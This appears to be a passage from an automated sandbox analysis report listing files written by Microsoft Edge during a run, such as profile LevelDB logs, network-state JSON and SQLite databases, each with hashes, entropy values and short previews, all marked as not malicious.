                                                                                                                                                                                                                                                                                                      SHA1:3A71F04708B7B47DBCA679E4E09C37E9AD450F14
                                                                                                                                                                                                                                                                                                      SHA-256:A0CFDEB8218743947F88E5192AF42454AF87551EDFBFAF27602A8A71A5814563
                                                                                                                                                                                                                                                                                                      SHA-512:F6A2E1DD66FEA181C28C97A459A6245BBA608D4CF3A6FBE5050033E35FB7DAB62D7820CB26B309ECF5761F30B82521DA3B760B0AA9BACD70F6ED5C8B54B6BEAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.639 408 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:57.641 408 Recovering log #3.2024/12/23-11:14:57.646 408 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):435
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.262764157865486
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:x8VvVaYebvqBQFUt8s0Hwg/+s/mI5OaYebvqBvJ:q5VaYebvZg8hHwJSOaYebvk
                                                                                                                                                                                                                                                                                                      MD5:679529FB26AD3F27C80F9C0938987ED2
                                                                                                                                                                                                                                                                                                      SHA1:3A71F04708B7B47DBCA679E4E09C37E9AD450F14
                                                                                                                                                                                                                                                                                                      SHA-256:A0CFDEB8218743947F88E5192AF42454AF87551EDFBFAF27602A8A71A5814563
                                                                                                                                                                                                                                                                                                      SHA-512:F6A2E1DD66FEA181C28C97A459A6245BBA608D4CF3A6FBE5050033E35FB7DAB62D7820CB26B309ECF5761F30B82521DA3B760B0AA9BACD70F6ED5C8B54B6BEAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.639 408 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:57.641 408 Recovering log #3.2024/12/23-11:14:57.646 408 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF44b4d.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a989b95f-c1e5-4312-8cb6-13ec8f6d0d87.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e2df301c-3bbe-446f-b341-98e3fd13aa5c.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e618f168-fc40-4e27-b037-38c5a4788602.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ecd85089-c047-494d-ba80-7845b7cbd003.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):423
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.225527673651129
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xwRAvVaYebvqBZFUt8sG/+s7T5OaYebvqBaJ:qAVaYebvyg8XFOaYebvL
                                                                                                                                                                                                                                                                                                      MD5:B40C05B4B03C505687DC188D368A3DB9
                                                                                                                                                                                                                                                                                                      SHA1:943047AF064E2A6B413B1ADD114D0032267436AD
                                                                                                                                                                                                                                                                                                      SHA-256:6B5E7D91AEB2A3CB042D0A96B49783959B975E44D49D288188751B2E7786E8DD
                                                                                                                                                                                                                                                                                                      SHA-512:D37F63B26F78CD6AD22D585DF42F3DD312247939F7576D39EED93F2615885F00DB5638590C2E48A0477CED76D1964CD2D4248CEA0C3BD7E886C7E30076E291A9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:15.354 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-11:15:15.356 640 Recovering log #3.2024/12/23-11:15:15.359 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):423
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.225527673651129
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xwRAvVaYebvqBZFUt8sG/+s7T5OaYebvqBaJ:qAVaYebvyg8XFOaYebvL
                                                                                                                                                                                                                                                                                                      MD5:B40C05B4B03C505687DC188D368A3DB9
                                                                                                                                                                                                                                                                                                      SHA1:943047AF064E2A6B413B1ADD114D0032267436AD
                                                                                                                                                                                                                                                                                                      SHA-256:6B5E7D91AEB2A3CB042D0A96B49783959B975E44D49D288188751B2E7786E8DD
                                                                                                                                                                                                                                                                                                      SHA-512:D37F63B26F78CD6AD22D585DF42F3DD312247939F7576D39EED93F2615885F00DB5638590C2E48A0477CED76D1964CD2D4248CEA0C3BD7E886C7E30076E291A9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:15.354 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-11:15:15.356 640 Recovering log #3.2024/12/23-11:15:15.359 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.194273234210621
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHE3VF34q2PN723oH+TcwtpIFUt8sOHE3VF3JZmw+sOHE3VF3DkwON723oH+TcM:xaEf4vVaYebmFUt8saEfJ/+saEfD5OaT
                                                                                                                                                                                                                                                                                                      MD5:5CDAC9643FDD8884F69DDDDAC30148B6
                                                                                                                                                                                                                                                                                                      SHA1:EBC00189A32C641EE36458924D29A33B1C6EBE70
                                                                                                                                                                                                                                                                                                      SHA-256:C0BA467AA0910514147239FC673CDE357265D042C4C08CAC7BA7999696F2682D
                                                                                                                                                                                                                                                                                                      SHA-512:BDC6C2C4FF7DDC43DCB0BDDE21EE3E9C8B8DC186B2612DF4A71B02FCF3DE6B4AFB0356256E82A41BEA159E0C7A297B45B27677C55D448DBB513A2955D80DF87B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.566 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-11:14:56.566 9e0 Recovering log #3.2024/12/23-11:14:56.566 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.194273234210621
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHE3VF34q2PN723oH+TcwtpIFUt8sOHE3VF3JZmw+sOHE3VF3DkwON723oH+TcM:xaEf4vVaYebmFUt8saEfJ/+saEfD5OaT
                                                                                                                                                                                                                                                                                                      MD5:5CDAC9643FDD8884F69DDDDAC30148B6
                                                                                                                                                                                                                                                                                                      SHA1:EBC00189A32C641EE36458924D29A33B1C6EBE70
                                                                                                                                                                                                                                                                                                      SHA-256:C0BA467AA0910514147239FC673CDE357265D042C4C08CAC7BA7999696F2682D
                                                                                                                                                                                                                                                                                                      SHA-512:BDC6C2C4FF7DDC43DCB0BDDE21EE3E9C8B8DC186B2612DF4A71B02FCF3DE6B4AFB0356256E82A41BEA159E0C7A297B45B27677C55D448DBB513A2955D80DF87B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.566 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-11:14:56.566 9e0 Recovering log #3.2024/12/23-11:14:56.566 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2680313905361795
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkMzSA1LyKOMq+8iP5GDHP/0jMVumS:Kq+n0Jz91LyKOMq+8iP5GLP/0/
                                                                                                                                                                                                                                                                                                      MD5:1E7C2DB97171FF0366B78CC79317B690
                                                                                                                                                                                                                                                                                                      SHA1:1A034AAF870E7D3ACE3051AAFD8F6736B7AF3F29
                                                                                                                                                                                                                                                                                                      SHA-256:F7D2FACFD87176E929C54AFE4CE8DED5AB19E6738B5E0E8F2E74F121D99A8457
                                                                                                                                                                                                                                                                                                      SHA-512:00AA475FE9A196AD35FD83C090AD16B64B31728073CE149CCF45111446DDB18764F7997BD269C37CEC2F9CA7067094722C44594D2A547349398CA0F3D488E2CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4666918805304971
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0f50:v7doKsKuKZKlZNmu46yjx0fy
                                                                                                                                                                                                                                                                                                      MD5:FE70902DDFA536B891CBB79B949D684F
                                                                                                                                                                                                                                                                                                      SHA1:8BC7F78E9BC4905E8FD8BD50BD1E33F1BE2B56D8
                                                                                                                                                                                                                                                                                                      SHA-256:E59C5D5FD1084F47487D991570C62F838581203C30CEAD604FC1FDDB05C19E23
                                                                                                                                                                                                                                                                                                      SHA-512:AD23BCF29EE5F0E89AF52866087D11CCEC98513C87A9B2E017B0F2721B5C8CF6805C079D61E5A3DC885D0011488C29E210944F3B871A3AFC0124941EE774BB20
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):12824
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.136755025221819
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:SMFtv9Nllv/etXlfsDNlho34//l/h4jRfn1d7jdtQfZlnctyJBd/lseXtXlfsBdn:SEtvMl0Blh04puj3dndclncsBllll0Bd
                                                                                                                                                                                                                                                                                                      MD5:F3EF865A2200EC93219DA99624DC2F7D
